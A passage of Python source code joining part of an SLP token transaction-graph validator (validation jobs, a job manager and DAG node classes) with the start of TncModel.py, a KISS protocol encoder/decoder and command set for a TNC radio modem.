1: 'Valid',
2: 'Invalid',
}
@abstractmethod
def get_info(self, tx):
""" This will be called with a Transaction object; use it to extract
all information necessary during the validation process (after call,
the Transaction object will be forgotten).
Allowed return values:
('prune', validity) -- prune this tx immediately, remember only validity.
(vin_mask, myinfo, outputs)
-- information for active, *potentially* valid tx.
The list `vin_mask = (True, False, False, True, ...)` tells which tx
inputs are to be considered for validation.
The list `outputs = (out_1, out_2, ...)` provides info that is needed
to validate descendant transactions. (e.g., how many tokens).
`vin_mask` and `outputs` must have lengths matching the tx inputs/outputs.
See `validate` for how these are used.
Pruning is done by replacing node references with prunednodes[validity] .
These will provide None as info for children.
"""
@abstractmethod
def check_needed(self, myinfo, out_n):
"""
As each input gets downloaded and its get_info() gets computed, we
check whether it is still relevant for validation.
(This is used to disconnect unimportant branches.)
Here we pass in `myinfo` from the tx, and `out_n` from the input
tx's get_info(); if it was pruned then `out_n` will be None.
"""
@abstractmethod
def validate(self, myinfo, inputs_info):
"""
Run validation. Only gets called after filtering through check_needed.
`myinfo` is direct from get_info().
`input_info` is a list with same length as `vins` from get_info()
[(vin_0, validity_0, out_n_0),
(vin_1, validity_1, out_n_1),
...
]
out_n_0 is the info from 0'th input's get_info() function,
but may be None if pruned/invalid.
Return:
None if undecided, or
(keepinfo, validity) if final judgement.
keepinfo may be:
False - prune, just save validity judgement.
True - save info and validity.
validity may be:
1 - valid
2 - invalid
Typically (False, 2) and (True, 1) but you *could* use (True, 2)
if it's necessary for children to know info from invalid parents.
"""
########
# Validation jobbing mechanics (downloading txes, building graph
########
def emptygetter(i):
raise KeyError
class ValidationJob:
"""
Manages a job whose actions are held in mainloop().
This implementation does a basic breadth-first search.
"""
download_timeout = 5
downloads = 0
currentdepth = 0
debugging_graph_state = False
stopping = False
running = False
stop_reason = None
has_never_run = True
def __init__(self, graph, txid, network,
fetch_hook=None,
validitycache=None,
download_limit=None, depth_limit=None,
debug=False, ref=None):
"""
graph should be a TokenGraph instance with the appropriate validator.
txid is the root of the graph to be validated.
txids is a list of the desired transactions.
network is a lib.network.Network object, will be used to download when
transactions can't be found in the cache.
fetch_hook (optional) called as fetch_hook({txid0,txid1,...},depth) whenever
a set of transactions is loaded into the graph (from cache or network)
at a given depth level. It should return a list of matching Transaction
objects, for known txids (e.g., from wallet or elsewhere),
but also can do other things (like fetching proxy results). Any txids
that are not returned will be fetched by network.
validitycache (optional) invoked as validitycache[txid_hex],
and should raise KeyError, otherwise return a validity value
that will be passed to load_tx.
download_limit is enforced by stopping search when the `downloads`
attribute exceeds this limit. (may exceed it by several, since
downloads are requested in parallel)
depth_limit sets the maximum graph depth to dig to.
"""
self.ref = ref and weakref.ref(ref)
self.graph = graph
self.root_txid = txid
self.txids = tuple([txid])
self.network = network
self.fetch_hook = fetch_hook
self.graph_search_job = None
self.validitycache = {} if validitycache is None else validitycache
self.download_limit = download_limit
if depth_limit is None:
self.depth_limit = INF_DEPTH - 1
else:
self.depth_limit = depth_limit
self.callbacks = []
self.debug = debug
self.exited = threading.Event()
self._statelock = threading.Lock()
def __repr__(self,):
if self.running:
state = 'running'
else:
try:
state = 'stopped:%r'%(self.stop_reason,)
except AttributeError:
state = 'waiting'
return "<%s object (%s) for txids=%r ref=%r>"%(type(self).__qualname__, state, self.txids, self.ref and self.ref())
def belongs_to(self, ref):
return ref is (self.ref and self.ref())
def has_txid(self, txid):
return txid in self.txids
## Job state management
def run(self,):
""" Wrapper for mainloop() to manage run state. """
with self._statelock:
if self.running:
raise RuntimeError("Job running already", self)
self.stopping = False
self.paused = False
self.running = True
self.stop_reason = None
self.has_never_run = False
try:
retval = self.mainloop()
return retval
except:
retval = 'crashed'
raise
finally:
self.exited.set()
with self._statelock:
self.stop_reason = retval
self.running = False
self.stopping = False
cbl = tuple(self.callbacks) # make copy while locked -- prevents double-callbacks
for cbr in cbl:
cb = cbr() # callbacks is a list of indirect references (may be weakrefs)
if cb is not None:
cb(self)
def stop(self,):
""" Call from another thread, to request stopping (this function
returns immediately, however it may take time to finish the current
set of micro-tasks.)
If not running then this is ignored and False returned.
Otherwise, True is returned."""
with self._statelock:
if self.running:
self.stopping = True
return True
else:
return False
def pause(self):
with self._statelock:
if self.running:
self.paused = True
return True
else:
return False
#@property
#def runstatus(self,):
#with self._statelock:
#if self.stopping:
#return "stopping"
#elif self.running:
#return "running"
#elif self.paused:
#return "paused"
#else:
#return "stopped"
def add_callback(self, cb, way='direct', allow_run_cb_now=True):
"""
Callback will be called with cb(job) upon stopping. May be called
more than once if job is restarted.
If job has run and is now stopped, this will be called immediately
(in calling thread) so as to guarantee it runs at least once.
`way` may be
- 'direct': store direct reference to `cb`.
- 'weak' : store weak reference to `cb`
- 'weakmethod' : store WeakMethod reference to `cb`.
(Use 'weakmethod' for bound methods! See weakref documentation.
"""
if way == 'direct':
cbr = hardref(cb)
elif way == 'weak':
cbr = weakref.ref(cb)
elif way == 'weakmethod':
cbr = weakref.WeakMethod(cb)
else:
raise ValueError(way)
with self._statelock:
self.callbacks.append(cbr)
if self.running or self.has_never_run:
# We are waiting to run first time, or currently running.
run_cb_now = False
else:
# We have run and we are now stopped.
run_cb_now = True
if run_cb_now and allow_run_cb_now:
cb(self)
## Validation logic (breadth-first traversal)
@property
def nodes(self,):
# get target nodes
return {t:self.graph.get_node(t) for t in self.txids}
def mainloop(self,):
""" Breadth-first search """
target_nodes = list(self.nodes.values())
self.graph.debugging = bool(self.debug)
if self.debug == 2:
# enable printing whole graph state for every step.
self.debugging_graph_state = True
self.graph.root.set_parents(target_nodes)
self.graph.run_sched()
def skip_callback(txid):
print("########################################## SKIPPING " + txid + " ###########################################")
node = self.graph.get_node(txid)
node.set_validity(False,2)
# temp for debugging
# f = open("dag-"+self.txids[0][0:5]+".txt","a")
# f.write(txid+","+str(self.currentdepth)+",false,\n")
def dl_callback(tx):
#will be called by self.get_txes
txid = tx.txid_fast()
# temp for debugging
# f = open("dag-"+self.txids[0][0:5]+".txt","a")
# f.write(txid+","+str(self.currentdepth)+",true,\n")
node = self.graph.get_node(txid)
try:
val = self.validitycache[txid]
except KeyError:
val = None
try:
node.load_tx(tx, cached_validity=val)
except DoubleLoadException:
pass
while True:
if self.stopping:
self.graph.debug("stop requested")
return "stopped"
if self.paused:
self.graph.debug("pause requested")
return "paused"
if not any(n.active for n in target_nodes):
# Normal finish - the targets are known.
self.graph.debug("target transactions finished")
return True
if self.download_limit is not None and self.downloads >= self.download_limit:
self.graph.debug("hit the download limit.")
return "download limit reached"
# fetch all finite-depth nodes
waiting = self.graph.get_waiting(maxdepth=self.depth_limit - 1)
if len(waiting) == 0: # No waiting nodes at all ==> completed.
# This really shouldn't happen
self.graph.debug("exhausted graph without conclusion.")
return "inconclusive"
# select all waiting txes at or below the current depth
interested_txids = {n.txid for n in waiting
if (n.depth <= self.currentdepth)}
if len(interested_txids) == 0:
# current depth exhausted, so move up
self.currentdepth += 1
if self.currentdepth > self.depth_limit:
self.graph.debug("reached depth stop.")
return "depth limit reached"
self.graph.debug("moving to depth = %d", self.currentdepth)
continue
# Download and load up results; this is the main command that
# will take time in this loop.
txids_missing = self.get_txes(interested_txids, dl_callback, skip_callback)
# do graph maintenance (ping() validation, depth recalculations)
self.graph.run_sched()
# print entire graph (could take a lot of time!)
if self.debugging_graph_state:
self.graph.debug("Active graph state:")
n_active = 0
for txid,n in self.graph._nodes.items():
if not n.active:
continue
self.graph.debug(" %.10s...[%8s] depth=%s"%(txid, n.status, str(n.depth) if n.depth != INF_DEPTH else 'INF_DEPTH'))
n_active += 1
if n_active == 0:
self.graph.debug(" (empty)")
txids_gotten = interested_txids.difference(txids_missing)
if len(txids_gotten) == 0:
return "missing txes"
raise RuntimeError('loop ended')
def get_txes(self, txid_iterable, dl_callback, skip_callback, errors='print'):
"""
Get multiple txes 'in parallel' (requests all sent at once), and
block while waiting. We first take txes via fetch_hook, and only if
missing do we then we ask the network.
As they are received, we call `dl_callback(tx)` in the current thread.
Returns a set of txids that could not be obtained, for whatever
reason.
`errors` may be 'ignore' or 'raise' or 'print'.
"""
txid_set = set(txid_iterable)
#search_id = ''.join(list(self.txids)) + "_" + str(self.currentdepth)
# first try to get from cache
if self.fetch_hook:
txns_cache = self.fetch_hook(txid_set, self)
cached = list(txns_cache)
for tx in cached:
# remove known txes from list
txid = tx.txid_fast()
txid_set.remove(txid)
else:
cached = []
# Graph Search Hack
# =====
# Here we determine if missing txids can just be inferred to be invalid
# because they are not currently in graph search results. The benefit is to
# prevent network calls to fetch non-contributing/invalid txns.
#
# This optimization requires all cache item source are equal to "graph_search"
#
if self.graph_search_job and self.graph_search_job.search_success:
for tx in cached:
dl_callback(tx)
for txid in txid_set:
skip_callback(txid)
txid_set.clear()
return txid_set
# build requests list from remaining txids.
requests = []
if self.network:
for txid in sorted(txid_set):
requests.append(('blockchain.transaction.get', [txid]))
if len(requests) > 0:
q = queue.Queue()
self.network.send(requests, q.put)
# Now that the net request is going, start processing cached txes.
for tx in cached:
dl_callback(tx)
# And start processing downloaded txes:
for _ in requests: # fetch as many responses as were requested.
try:
resp = q.get(True, self.download_timeout)
except queue.Empty: # timeout
break
if resp.get('error'):
if errors=="print":
print("Tx request error:", resp.get('error'), file=sys.stderr)
elif errors=="raise":
raise RuntimeError("Tx request error", resp.get('error'))
else:
raise ValueError(errors)
continue
raw = resp.get('result')
self.downloads += 1
tx = Transaction(raw)
txid = tx.txid_fast()
try:
txid_set.remove(txid)
except KeyError:
if errors=="print":
print("Received un-requested txid! Ignoring.", txid, file=sys.stderr)
elif errors=="raise":
raise RuntimeError("Received un-requested txid!", txid)
else:
raise ValueError(errors)
else:
dl_callback(tx)
return txid_set
class ValidationJobManager(PrintError):
"""
A single thread that processes validation jobs sequentially.
"""
def __init__(self, threadname="ValidationJobManager", graph_context=None, exit_when_done=False):
# ---
self.graph_context = graph_context
self.jobs_lock = threading.Lock()
self.job_current = None
self.jobs_pending = [] # list of jobs waiting to run.
self.jobs_finished = weakref.WeakSet() # set of jobs finished normally.
self.jobs_stopped = weakref.WeakSet() # set of jobs stopped by calling .stop(), or that terminated abnormally with an error and/or crash
self.jobs_paused = [] # list of jobs that stopped by calling .pause()
self.all_jobs = weakref.WeakSet()
self.wakeup = threading.Event() # for kicking the mainloop to wake up if it has fallen asleep
self.exited = threading.Event() # for synchronously waiting for jobmgr to exit
# ---
self._exit_when_done = exit_when_done
self._killing = False # set by .kill()
# Kick off the thread
self.thread = threading.Thread(target=self.mainloop, name=threadname, daemon=True)
self.thread.start()
@property
def threadname(self):
return (self.thread and self.thread.name) or ''
def diagnostic_name(self): return self.threadname
def add_job(self, job):
""" Throws ValueError if job is already pending. """
with self.jobs_lock:
if job in self.all_jobs:
raise ValueError
self.all_jobs.add(job)
self.jobs_pending.append(job)
self.wakeup.set()
def _stop_all_common(self, job):
''' Private method, properly stops a job (even if paused or pending),
checking the appropriate lists. Returns 1 on success or 0 if job was
not found in the appropriate lists.'''
if job.stop():
return True
else:
# Job wasn't running -- try and remove it from the
# pending and paused lists
try:
self.jobs_pending.remove(job)
return True
except ValueError:
pass
try:
self.jobs_paused.remove(job)
return True
except ValueError:
pass
return False
def stop_all_for(self, ref):
ret = []
with self.jobs_lock:
for job in list(self.all_jobs):
if job.belongs_to(ref):
if self._stop_all_common(job):
ret.append(job)
return ret
def stop_all_with_txid(self, txid):
ret = []
with self.jobs_lock:
for job in list(self.all_jobs):
if job.has_txid(txid):
if self._stop_all_common(job):
ret.append(job)
return ret
def pause_job(self, job):
"""
Returns True if job was running or pending.
Returns False otherwise.
"""
with self.jobs_lock:
if job is self.job_current:
if job.pause():
return True
else:
# rare situation
# - running job just stopped.
return False
else:
try:
self.jobs_pending.remove(job)
except ValueError:
return False
else:
self.jobs_paused.append(job)
return True
def unpause_job(self, job):
""" Take a paused job and put it back into pending.
Throws ValueError if job is not in paused list. """
with self.jobs_lock:
self.jobs_paused.remove(job)
self.jobs_pending.append(job)
self.wakeup.set()
def kill(self, ):
"""Request to stop running job (if any) and to after end thread.
Irreversible."""
self._killing = True
self.wakeup.set()
try:
self.job_current.stop()
except:
pass
self.graph_context = None
def mainloop(self,):
ran_ctr = 0
try:
if threading.current_thread() is not self.thread:
raise RuntimeError('wrong thread')
while True:
if self._killing:
return
with self.jobs_lock:
self.wakeup.clear()
has_paused_jobs = bool(len(self.jobs_paused))
try:
self.job_current = self.jobs_pending.pop(0)
except IndexError:
# prepare to sleep, outside lock
self.job_current = None
if self.job_current is None:
if self._exit_when_done and not has_paused_jobs and ran_ctr:
# we already finished our enqueued jobs, nothing is paused, so just exit since _exit_when_done == True
return # exit thread when done
self.wakeup.wait()
continue
try:
retval = self.job_current.run()
ran_ctr += 1
except BaseException as e:
# NB: original code used print here rather than self.print_error
# for unconditional printing even if not running with -v.
# We preserve that behavior, for now.
print("vvvvv validation job error traceback", file=sys.stderr)
traceback.print_exc()
print("^^^^^ validation job %r error traceback"%(self.job_current,), file=sys.stderr)
self.jobs_stopped.add(self.job_current)
else:
with self.jobs_lock:
if retval is True:
self.jobs_finished.add(self.job_current)
elif retval == 'paused':
self.jobs_paused.append(self.job_current)
else:
self.jobs_stopped.add(self.job_current)
self.job_current = None
except:
traceback.print_exc()
print("Thread %s crashed :("%(self.thread.name,), file=sys.stderr)
finally:
self.exited.set()
self.print_error("Thread exited")
########
# Graph stuff below
########
class TokenGraph:
""" Used with Node class to hold a dynamic DAG structure, used while
traversing the transaction DAG. This dynamic DAG holds dependencies
among *active* transactions (nonzero contributions with unknown validity)
and so it's a subset of the transactions DAG.
Why dynamic? As we go deeper we add connections, sometimes adding
connections between previously-unconnected parts. We can also remove
connections as needed for pruning.
The terms "parent" and "child" refer to the ancestry of a tx -- child
transactions contain (in inputs) a set of pointers to their parents.
A key concept is the maintenance of a 'depth' value for each active node,
which represents the shortest directed path from root to node. The depth
is used to prioritize downloading in a breadth-first search.
Nodes that are inactive or disconnected from root are assigned depth=INF_DEPTH.
Graph updating occurs in three phases:
Phase 1: Waiting nodes brought online with load_tx().
Phase 2: Children get notified of parents' updates via ping(), which may
further alter graph (as validity conclusions get reached).
Phase 3: Depths updated via recalc_depth().
At the end of Phase 3, the graph is stabilized with correct depth values.
`root` is a special origin node fixed at depth=-1, with no children.
The actual transaction(s) under consideration get added as parents of
this root and hence they are depth=0.
Rather than call-based recursion (cascades of notifications running up and
down the DAG) we use a task scheduler, provided by `add_ping()`,
`add_recalc_depth()` and `run_sched()`.
"""
debugging = False
def __init__(self, validator):
self.validator = validator
self._nodes = dict() # txid -> Node
self.root = NodeRoot(self)
self._waiting_nodes = []
# requested callbacks
self._sched_ping = set()
self._sched_recalc_depth = set()
# create singletons for pruning
self.prunednodes = {v:NodeInactive(v, None) for v in validator.validity_states.keys()}
# Threading rule: we never call node functions while locked.
# self._lock = ... # threading not enabled.
def reset(self, ):
# copy nodes and reset self
prevnodes = self._nodes
TokenGraph.__init__(self, self.validator)
# nuke Connections to encourage prompt GC
for n in prevnodes.values():
try:
n.conn_children = []
n.conn_parents = []
except:
pass
def debug(self, formatstr, *args):
if self.debugging:
print("DEBUG-DAG: " + formatstr%args, file=sys.stderr)
def get_node(self, txid):
# with self._lock:
try:
node = self._nodes[txid]
except KeyError:
node = Node(txid, self)
self._nodes[txid] = node
self._waiting_nodes.append(node)
return node
def replace_node(self, txid, replacement):
self._nodes[txid] = replacement # threadsafe
def add_ping(self, node):
self._sched_ping.add(node) # threadsafe
def add_recalc_depth(self, node, depthpriority):
# currently ignoring depthpriority
self._sched_recalc_depth.add(node) # threadsafe
def run_sched(self):
""" run the pings scheduled by add_ping() one at a time, until the
schedule list is empty (note: things can get added/re-added during run).
then do the same for stuff added by add_recalc_depth().
TODO: consider making this depth prioritized to reduce redundant work.
"""
# should be threadsafe without lock (pop() is atomic)
while True:
try:
node = self._sched_ping.pop()
except KeyError:
return
node.ping()
while True:
try:
node = self._sched_recalc_depth.pop()
except KeyError:
return
node.recalc_depth()
def get_waiting(self, maxdepth=INF_DEPTH):
""" Return a list of waiting nodes (that haven't had load_tx called
yet). Optional parameter specifying maximum depth. """
# with self._lock:
# First, update the _waiting_nodes list.
waiting_actual = [node for node in self._waiting_nodes if node.waiting]
# This is needed to handle an edge case in NFT1 validation
# this occurs when the child genesis is paused and is also the root_txid of the job
from .slp_validator_0x01_nft1 import Validator_NFT1
if isinstance(self.validator, Validator_NFT1) and len(waiting_actual) == 0:
waiting_actual.extend([conn.parent for conn in self.root.conn_parents if conn.parent.waiting])
self._waiting_nodes = waiting_actual
if maxdepth == INF_DEPTH:
return list(waiting_actual) # return copy
else:
return [node for node in waiting_actual
if node.depth <= maxdepth]
def get_active(self):
return [node for node in self._nodes.values() if node.active]
def finalize_from_proxy(self, proxy_results):
"""
Iterate over remaining active nodes and set their validity to the proxy result,
starting from the deepest ones and moving up.
"""
active = self.get_active()
active = sorted(active, key = lambda x: x.depth, reverse=True)
for n in active:
if not n.active or n.depth == INF_DEPTH:
# some nodes may switch to inactive or lose depth while we are updating; skip them
continue
txid = n.txid
try:
proxyval = proxy_results[txid]
except KeyError:
self.debug("Cannot find proxy validity for %.10s..."%(txid,))
continue
self.debug("Using proxy validity (%r) for %.10s..."%(proxyval, txid,))
# every step:
n.set_validity(*proxyval)
self.run_sched()
class Connection:
# Connection represents a tx output <-> tx input connection
# (we don't used namedtuple since we want 'parent' to be modifiable.)
__slots__ = ('parent', 'child', 'vout', 'vin', 'checked')
def __init__(self, parent,child,vout,vin):
self.parent = parent
self.child = child
self.vout = vout
self.vin = vin
self.checked = False
class Node:
"""
Nodes keep essential info about txes involved in the validation DAG.
They have a list of Connections to parents (inputs) and to children
(outputs).
Connections to children are used to notify (via ping()) when:
- Node data became available (changed from waiting to live)
- Node conclusion reached (changed from active to inactive)
- Connection pruned (parent effectively inactive)
Connections to parents are used to notify them when our depth gets
updated.
When our node is active, it can either be in waiting state where the
transaction data is not yet available, or in a live state.
The node becomes inactive when a conclusion is reached: either
pruned, invalid, or valid. When this occurs, the node replaces itself
with a NodeInactive object (more compact).
"""
def __init__(self, txid, graph):
self.txid = txid
self.graph = graph
self.conn_children = list()
self.conn_parents = ()
self.depth = INF_DEPTH
self.waiting = True
self.active = True
self.validity = 0 # 0 - unknown, 1 - valid, 2 - invalid
self.myinfo = None # self-info from get_info().
self.outputs = None # per-output info from get_info(). None if waiting/pruned/invalid.
# self._lock = ... # threading not enabled.
@property
def status(self):
if self.waiting:
return 'waiting'
if self.active:
return 'live'
else:
return 'inactive'
def __repr__(self,):
return "<%s %s txid=%r>"%(type(self).__qualname__, self.status, self.txid)
## Child connection adding/removing
def add_child(self, connection):
""" Called by children to subscribe notifications.
(If inactive, a ping will be scheduled.)
"""
# with self._lock:
if not self.active:
connection.parent = self.replacement
self.graph.add_ping(connection.child)
return
if connection.parent is not self:
raise RuntimeError('mismatch')
self.conn_children.append(connection)
newdepth = min(1 + connection.child.depth,
INF_DEPTH)
olddepth = self.depth
if newdepth < olddepth:
# found a shorter path from root
self.depth = newdepth
for c in self.conn_parents:
if c.parent.depth == 1 + olddepth:
# parent may have been hanging off our depth value.
self.graph.add_recalc_depth(c.parent, newdepth)
return
def del_child(self, connection):
""" called by children to remove connection
"""
# with self._lock:
self.conn_children.remove(connection)
if self.depth <= connection.child.depth+1:
self.graph.add_recalc_depth(self, self.depth)
## Loading of info
def load_tx(self, tx, cached_validity = None):
""" Convert 'waiting' transaction to live one. """
# with self._lock:
if not self.waiting:
raise DoubleLoadException(self)
if tx.txid_fast() != self.txid:
raise ValueError("TXID mismatch", tx.txid_fast(), self.txid)
validator = self.graph.validator
ret = validator.get_info(tx)
if len(ret) == 2:
self.graph.debug("%.10s... judged upon loading: %s",
self.txid, self.graph.validator.validity_states.get(ret[1],ret[1]))
if ret[0] != 'prune':
raise ValueError(ret)
return self._inactivate_self(False, ret[1])
vin_mask, self.myinfo, self.outputs = ret
if len(self.outputs) != len(tx.outputs()):
raise ValueError("output length mismatch")
if cached_validity is not None:
self.graph.debug("%.10s... cached judgement: %s",
self.txid, self.graph.validator.validity_states.get(cached_validity,cached_validity))
return self._inactivate_self(True, cached_validity)
# at this point we have exhausted options for inactivation.
# build connections to parents
txinputs = tx.inputs()
if len(vin_mask) != len(txinputs):
raise ValueError("input length mismatch")
conn_parents = []
for vin, (mask, inp) in enumerate(zip(vin_mask, txinputs)):
if not mask:
continue
txid = inp['prevout_hash']
vout = inp['prevout_n']
p = self.graph.get_node(txid)
c = Connection(p,self,vout,vin)
p.add_child(c)
conn_parents.append(c)
self.conn_parents = conn_parents
self.waiting = False
self.graph.add_ping(self)
if len(self.conn_parents) != 0:
# (no parents? children will be pinged after validation)
for c in self.conn_children:
self.graph.add_ping(c.child)
def load_pruned(self, cached_validity):
# with self._lock:
if not self.waiting:
raise DoubleLoadException(self)
self.graph.debug("%.10s... load pruned: %s",
self.txid, self.graph.validator.validity_states.get(cached_validity,cached_validity))
return self._inactivate_self(False, cached_validity)
def set_validity(self, keepinfo, validity):
# with self._lock:
self._inactivate_self(keepinfo, validity)
## Internal utility stuff
def _inactivate_self(self, keepinfo, validity):
# Replace self with NodeInactive instance according to keepinfo and validity
# no thread locking here, this only gets called internally.
if keepinfo:
replacement = NodeInactive(validity, self.outputs)
else:
replacement = self.graph.prunednodes[validity] # use singletons
# replace self in lookups
self.graph.replace_node(self.txid, replacement)
# unsubscribe from parents & forget
for c in self.conn_parents:
c.parent.del_child(c)
self.conn_parents = ()
# replace self in child connections & forget
for c in self.conn_children:
c.parent = replacement
c.checked = False
self.graph.add_ping(c.child)
self.conn_children = ()
# At this point all permanent refs to us should be gone and we will soon be deleted.
# Temporary refs may remain, for which we mimic the replacement.
self.waiting = False
self.active = False
self.depth = replacement.depth
self.validity = replacement.validity
self.outputs = replacement.outputs
self.replacement = replacement
def recalc_depth(self):
# with self._lock:
if not self.active:
return
depths = [c.child.depth for c in self.conn_children]
depths.append(INF_DEPTH-1)
newdepth = 1 + min(depths)
olddepth = self.depth
if newdepth != olddepth:
self.depth = newdepth
depthpriority = 1 + min(olddepth, newdepth)
for c in self.conn_parents:
self.graph.add_recalc_depth(c.parent, depthpriority)
def get_out_info(self, c):
# Get info for the connection and check if connection is needed.
# Returns None if validator's check_needed returns False.
# with self._lock:
try:
out = self.outputs[c.vout]
except TypeError: # outputs is None or vout is None
out = None
if not c.checked and not self.waiting:
if c.child.graph.validator.check_needed(c.child.myinfo, out):
c.checked = True
else:
return None
return (self.active, self.waiting, c.vin, self.validity, out)
def ping(self, ):
""" handle notification status update on one or more parents """
# with self._lock:
if not self.active:
return
validator = self.graph.validator
# get info, discarding unneeded parents.
pinfo = []
for c in tuple(self.conn_parents):
info = c.parent.get_out_info(c)
if info is None:
c.parent.del_child(c)
self.conn_parents.remove(c)
else:
pinfo.append(info)
anyactive = any(info[0] for info in pinfo)
if validator.prevalidation:
if any(info[1] for info in pinfo):
return
else:
if anyactive:
return
valinfo = [info[2:] for info in pinfo]
ret = validator.validate(self.myinfo, valinfo)
if ret is None: # undecided
from .slp_validator_0x01_nft1 import Validator_NFT1
if isinstance(validator, Validator_NFT1):
self.waiting = True
return
if not anyactive:
raise RuntimeError("Undecided with finalized parents",
self.txid, self.myinfo, valinfo)
return
else: # decided
self.graph.debug("%.10s... judgement based on inputs: %s",
self.txid, self.graph.validator.validity_states.get(ret[1],ret[1]))
self._inactivate_self(*ret)
class NodeRoot: # Special root, only one of these is created per TokenGraph.
depth = -1
def __init__(self, graph):
self.graph = graph
self.conn_parents = []
def set_parents(self, parent_nodes):
# Remove existing parent connections
for c in tuple(self.conn_parents):
c.parent.del_child(c)
self.conn_parents.remove(c)
# Add new ones
for p in parent_nodes:
c = Connection(p, self, None, None)
p.add_child(c)
self.conn_parents.append(c)
return c
def ping(self,):
pass
# container used to replace Node with static result
class NodeInactive(collections.namedtuple('anon_namedtuple',
['validity', 'outputs'])):
__slots__ = () # no dict needed
active = False
waiting = False
depth = INF_DEPTH
txid = None
status = "inactive"
def get_out_info(self, c):
# Get info for the connection and check if connection is needed.
# Returns None if validator's check_needed returns False.
try:
out = self.outputs[c.vout]
except TypeError: # outputs is None or vout is None
out = None
if not c.checked:
if c.child.graph.validator.check_needed(c.child.myinfo, out):
c.checked = True
else:
return None
return (False, False, c.vin, self.validity, out)
def load_tx(self, tx, cached_validity = None):
raise DoubleLoadException(self)
def add_child(self, connection): # refuse connection and ping
connection.child.graph.add_ping(connection.child)
def del_child(self, connection): pass
def recalc_depth(self): pass
|
TncModel.py
|
#!/bin/env python2.7
from __future__ import print_function, unicode_literals
from builtins import bytes, chr
import threading
import serial
import time
import datetime
import math
import traceback
from io import StringIO, BytesIO
from struct import pack, unpack
from gi.repository import GLib
from BootLoader import BootLoader
import binascii
class UTC(datetime.tzinfo):
"""UTC"""
ZERO = datetime.timedelta(0)
def utcoffset(self, dt):
return self.ZERO
def tzname(self, dt):
return "UTC"
def dst(self, dt):
return self.ZERO
utc = UTC()
class KissData(object):
def __init__(self):
self.packet_type = None;
self.sub_type = None;
self.data = None
self.ready = False;
class KissDecode(object):
WAIT_FEND = 1
WAIT_PACKET_TYPE = 2
WAIT_SUB_TYPE = 3
WAIT_DATA = 4
FEND = 0xC0
FESC = 0xDB
TFEND = 0xDC
TFESC = 0xDD
def __init__(self):
self.state = self.WAIT_FEND
self.packet = KissData()
self.escape = False
self.parser = {
self.WAIT_FEND: self.wait_fend,
self.WAIT_PACKET_TYPE: self.wait_packet_type,
self.WAIT_SUB_TYPE: self.wait_sub_type,
self.WAIT_DATA: self.wait_data}
self.tmp = bytearray()
def process(self, c):
if self.escape:
if c == self.TFEND:
c = self.FEND
elif c == self.TFESC:
c = self.FESC
else:
# Bogus sequence
self.escape = False
return None
elif c == self.FESC:
self.escape = True
return None
self.parser[self.state](c, self.escape)
self.escape = False
if self.packet is not None and self.packet.ready:
return self.packet
else:
return None
def wait_fend(self, c, escape):
if c == self.FEND:
self.state = self.WAIT_PACKET_TYPE
self.packet = KissData()
# print self.tmp
self.tmp = bytearray()
else:
self.tmp.append(c)
def wait_packet_type(self, c, escape):
if not escape and c == self.FEND: return # possible dupe
self.packet.packet_type = c
if c == 0x06:
self.state = self.WAIT_SUB_TYPE
else:
self.packet.data = bytearray()
self.state = self.WAIT_DATA
def wait_sub_type(self, c, escape):
self.packet.sub_type = c
self.packet.data = bytearray()
self.state = self.WAIT_DATA
def wait_data(self, c, escape):
if not escape and c == self.FEND:
self.packet.ready = True
self.state = self.WAIT_FEND
else:
self.packet.data.append(c)
class KissEncode(object):
FEND = bytes(b'\xC0')
FESC = bytes(b'\xDB')
TFEND = bytes(b'\xDC')
TFESC = bytes(b'\xDD')
def __init__(self):
pass
def encode(self, data):
buf = BytesIO()
buf.write(self.FEND)
for c in [x for x in data]:
if c == self.FEND:
buf.write(self.FESC)
buf.write(self.TFEND)
elif c == self.FESC:
buf.write(bytes([c]))
buf.write(self.TFESC)
else:
buf.write(bytes([c]))
buf.write(self.FEND)
return buf.getvalue()
class TncModel(object):
SET_TX_DELAY = bytes(b'\01%c')
SET_PERSISTENCE = bytes(b'\02%c')
SET_TIME_SLOT = bytes(b'\03%c')
SET_TX_TAIL = bytes(b'\04%c')
SET_DUPLEX = bytes(b'\05%c')
GET_BATTERY_LEVEL = bytes(b'\06\06')
SET_OUTPUT_VOLUME = bytes(b'\06\01%c')
SET_OUTPUT_GAIN = bytes(b'\x06\x01%c%c') # API 2.0, 16-bit signed
SET_INPUT_TWIST = bytes(b'\x06\x18\%s') # API 2.0, 0-100
SET_OUTPUT_TWIST = bytes(b'\x06\x1a\%c') # API 2.0, 0-100
SET_INPUT_ATTEN = bytes(b'\06\02%c')
SET_INPUT_GAIN = bytes(b'\06\02%c%c') # API 2.0, 16-bit signed
SET_SQUELCH_LEVEL = bytes(b'\06\03%c')
GET_ALL_VALUES = bytes(b'\06\177') # Get all settings and versions
POLL_VOLUME = bytes(b'\06\04') # One value
STREAM_VOLUME = bytes(b'\06\05') # Stream continuously
ADJUST_INPUT_LEVELS = bytes(b'\06\x2b') # API 2.0
SET_DATETIME = bytes(b'\x06\x32%c%c%c%c%c%c%c') # API 2.0, BCD YMDWHMS
PTT_MARK = bytes(b'\06\07')
PTT_SPACE = bytes(b'\06\010')
PTT_BOTH = bytes(b'\06\011')
PTT_OFF = bytes(b'\06\012')
SET_BT_CONN_TRACK = bytes(b'\06\105%c')
SAVE_EEPROM_SETTINGS = bytes(b'\06\052')
SET_USB_POWER_ON = bytes(b'\06\111%c')
SET_USB_POWER_OFF = bytes(b'\06\113%c')
SET_VERBOSITY = bytes(b'\06\020%c')
SET_PTT_CHANNEL = bytes(b'\06\117%c')
GET_PTT_CHANNEL = bytes(b'\06\120')
SET_PASSALL = bytes(b'\06\x51%c')
SET_MODEM_TYPE = bytes(b'\06\xc1\x82%c')
SET_RX_REVERSE_POLARITY = bytes(b'\06\x53%c')
SET_TX_REVERSE_POLARITY = bytes(b'\06\x55%c')
TONE_NONE = 0
TONE_SPACE = 1
TONE_MARK = 2
TONE_BOTH = 3
HANDLE_TX_DELAY = 33
HANDLE_PERSISTENCE = 34
HANDLE_SLOT_TIME = 35
HANDLE_TX_TAIL = 36
HANDLE_DUPLEX = 37
HANDLE_INPUT_LEVEL = 4
HANDLE_BATTERY_LEVEL = 6
HANDLE_TX_VOLUME = 12
HANDLE_TX_TWIST = 27 # API 2.0
HANDLE_INPUT_ATTEN = 13 # API 1.0
HANDLE_INPUT_GAIN = 13 # API 2.0
HANDLE_INPUT_TWIST = 25 # API 2.0
HANDLE_SQUELCH_LEVEL = 14
HANDLE_VERBOSITY = 17
HANDLE_FIRMWARE_VERSION = 40
HANDLE_HARDWARE_VERSION = 41
